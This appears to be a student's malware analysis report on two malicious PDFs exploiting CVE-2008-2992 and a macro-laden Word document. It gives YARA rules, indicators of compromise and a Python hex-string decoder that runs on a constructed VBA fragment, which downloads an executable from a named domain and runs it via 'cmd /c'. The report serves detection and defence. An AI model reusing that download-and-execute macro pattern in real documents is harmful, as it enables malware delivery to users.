Gary Jones

Word and PDF Malware Reverse Engineering Report: Practical Assignment 4

Malware Reverse Engineering Report: Practical Assignment 4


Situation:

This assignment analyzed three malicious documents from spear-phishing campaigns: two PDFs (sample4a.pdf and sample4b.pdf) and a Microsoft Word document (sample4c.doc). The focus was on extracting metadata, identifying malicious behaviors, and creating YARA rules for detection.


Obstacles:

  1. Document Compression:
    • The PDF files employed /Filter /FlateDecode, requiring decompression for analysis.
  2. Obfuscated Code:
    • JavaScript and VBA code were heavily obfuscated, complicating static analysis.
  3. Multiple Exploit Techniques:
    • The PDFs used CVE-2008-2992 (util.printf buffer overflow) while the Word document leveraged shell commands and external HTTP requests.

Actions Taken:

  1. Sample4a.pdf:

    • Used peepdf and pdf-parser to extract metadata and decompress encoded streams.
    • Detected JavaScript exploiting CVE-2008-2992 to execute shell code.
    • Analyzed shell code using SpiderMonkey and scdbg, identifying a download of a.exe from beshragos.com.
    • Developed the following YARA rule:
      rule beshragos_yara {
        meta:
          description = "Detects malicious PDF from beshragos.com"
        strings:
          $a = "/ID[<CA16DB0E50F60C66FCDBDA9D468C7D94><CA16DB0E50F60C66FCDBDA9D468C7D94>]"
        condition:
          ($a)
      }
  2. Sample4b.pdf:

    • Analyzed with peepdf, revealing obfuscated JavaScript invoking the Z0PEA5PLzPyyw() function.
    • The function contacted 64.22.81.244 to download and execute style.exe via the util.printf exploit.
    • Created the following YARA rule:
      rule style_yara {
        meta:
          description = "Detects malicious PDF that downloads style.exe"
        strings:
          $a = "<</OpenAction <</JS (this.Z0PEA5PLzPyyw\\(\\))"
        condition:
          ($a)
      }
  3. Sample4c.doc:

    • Examined with oledump.py to extract VBA macros.
    • Identified a bin.exe download from fachonet.com, creating YEWZMJFAHIB.exe in the Temp directory.
    • Used a custom Python script to deobfuscate hex-encoded strings.
    • Developed the following YARA rule:
      rule fachonet_yara {
        meta:
          description = "Detects malicious document from fachonet.com"
        strings:
          $a = "\\YEWZMJFAHIB.exe"
        condition:
          ($a)
      }
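The report mentions a custom Python script for the hex-encoded strings in the sample4c.doc macro but does not show it. The block below is an added illustration, not the author's script: it takes a macro dump in the form oledump.py prints and decodes two common VBA encodings (quoted hex literals and Chr(&H..) chains), then pulls URLs and .exe names out of the decoded text. The VBA fragment, the Decode/Fetch helper names and the hex values are constructed for the example; only the URL and file name it encodes come from the report.

```python
import re

# Constructed VBA fragment in the form "oledump.py -s <n> -v" prints a macro stream.
# It is NOT the real sample4c.doc macro; Decode() and Fetch() are placeholder names,
# the hex literals encode the URL and file name the report names, and the Chr(&H..)
# chain encodes "cmd", so the decoder can be exercised offline.
SAMPLE_VBA = r'''
Sub AutoOpen()
    Dim u As String, f As String
    u = Decode("687474703a2f2f666163686f6e65742e636f6d2f62696e2e657865")
    f = Environ("TEMP") & Decode("5c5945575a4d4a46414849422e657865")
    Call Fetch(u, f)
    Call Shell(Chr(&H63) & Chr(&H6D) & Chr(&H64) & " /c " & f)
End Sub
'''

# A quoted literal made only of hex digit pairs (at least 4 pairs, to skip short
# words such as "cafe" that happen to be valid hex).
HEX_LITERAL = re.compile(r'"((?:[0-9A-Fa-f]{2}){4,})"')
# Two or more Chr(&Hxx) calls joined with "&".
CHR_SEQ = re.compile(r'(?:Chr\(&H[0-9A-Fa-f]{2}\)\s*&?\s*){2,}')
CHR_ONE = re.compile(r'Chr\(&H([0-9A-Fa-f]{2})\)')
# URLs and .exe names, the IoC types the report extracted.
IOC_PATTERN = re.compile(r'(https?://[^\s"]+|\\?[\w-]+\.exe)', re.I)


def decode_obfuscated_strings(vba_text):
    """Return every decoded string, in order of appearance in the macro."""
    found = []
    for m in HEX_LITERAL.finditer(vba_text):
        found.append((m.start(), bytes.fromhex(m.group(1)).decode("latin-1")))
    for m in CHR_SEQ.finditer(vba_text):
        chars = "".join(chr(int(h, 16)) for h in CHR_ONE.findall(m.group(0)))
        found.append((m.start(), chars))
    return [text for _, text in sorted(found)]


def extract_iocs(vba_text):
    """Decode the macro's strings and pull out URLs and executable names."""
    iocs = set()
    for text in decode_obfuscated_strings(vba_text):
        iocs.update(IOC_PATTERN.findall(text))
    return sorted(iocs)


if __name__ == "__main__":
    for s in decode_obfuscated_strings(SAMPLE_VBA):
        print(repr(s))
    print(extract_iocs(SAMPLE_VBA))
```

The decoded file name is exactly the string the fachonet_yara rule above keys on, which is how a decoded string becomes a rule candidate.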

Results:

  1. Malware Identified:
    • Sample4a and Sample4b exploited CVE-2008-2992.
    • Sample4c downloaded and executed files from fachonet.com.
  2. Indicators of Compromise:
    • Network (domains and IP address): beshragos.com, 64.22.81.244, fachonet.com.
    • Files: a.exe, style.exe, YEWZMJFAHIB.exe.

Tool Purpose Overview:

peepdf:

  • Analyzed PDF metadata and extracted JavaScript for static analysis.

pdf-parser:

  • Decompressed encoded streams in PDFs.

oledump.py:

  • Extracted and analyzed macros from Word documents.

SpiderMonkey:

  • Executed and debugged JavaScript shell code.

scdbg:

  • Simulated shell code execution to analyze behavior.

RegShot:

  • Monitored file system and registry changes post-execution.

Recommendations:

  1. Patch Vulnerable Software:
    • Update Adobe Reader and Microsoft Office to mitigate known exploits.
  2. Monitor Network Activity:
    • Block suspicious domains and IPs identified as IoCs.
  3. Enhance Email Security:
    • Filter spear-phishing emails containing malicious attachments.
  4. User Training:
    • Educate users on recognizing and avoiding phishing attempts.